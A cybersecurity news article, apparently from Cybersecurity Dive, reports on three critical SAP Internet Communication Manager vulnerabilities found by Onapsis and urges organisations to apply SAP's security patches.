Feb 12, 2022
43 Views
0 0

Critical SAP vulnerabilities spur CISA, researcher pleas for urgent patching

Written by

Onapsis researchers discovered the vulnerabilities following extensive research in 2021 over a technique called HTTP Response Smuggling, according to JP Perez-Etchegoyen, CTO at the security firm. Using the technique, attackers could control responses sent by a SAP application and enable the attack to persist. 
“This means that with a single request, an attacker could be able to steal every victim session and credentials in plain text and modify the behavior of the applications,” Perez-Etchegoyen said in an email.
There is no evidence the vulnerabilities have been exploited in the wild, he added, but recently active threat groups like Elephant Beetle and BlackCat consider business critical applications a lucrative target. 
ICM is a component of SAP that enables HTTP(S) communications in the company’s systems, Vic Chung, director of security response at SAP, wrote in a blogpost. Because ICM is exposed to the internet and untrusted networks by design, it is highly vulnerable to attack. 
Onapsis and SAP said the three vulnerabilities, dubbed ICMAD — Internet Communication Manager Advanced Desync —  are identified as CVE-2022-22536, CVE-2022-22532 and CVE-2022-22533. The first vulnerability has the highest risk score of 10. 
SAP and Onapsis said organizations should apply Security Notes 3123396 and 3123427 to their affected SAP applications right away. Onapsis also released an open source tool to allow organizations to scan their SAP systems for CVE-2022-22536.
Get the free daily newsletter read by industry experts
A diplomatic standoff with Russia threatens to drag U.S. companies and critical infrastructure into wider security crisis that could echo NotPetya. 
An IDG survey found security improvements are driving IT budget increases. 
Subscribe to Cybersecurity Dive for top news, trends & analysis
Get the free daily newsletter read by industry experts
Want to share a company announcement with your peers?
Get started
A diplomatic standoff with Russia threatens to drag U.S. companies and critical infrastructure into wider security crisis that could echo NotPetya. 
An IDG survey found security improvements are driving IT budget increases. 
The free newsletter covering the top industry headlines

source

Article Categories:
Cybersecurity News

Comments are closed.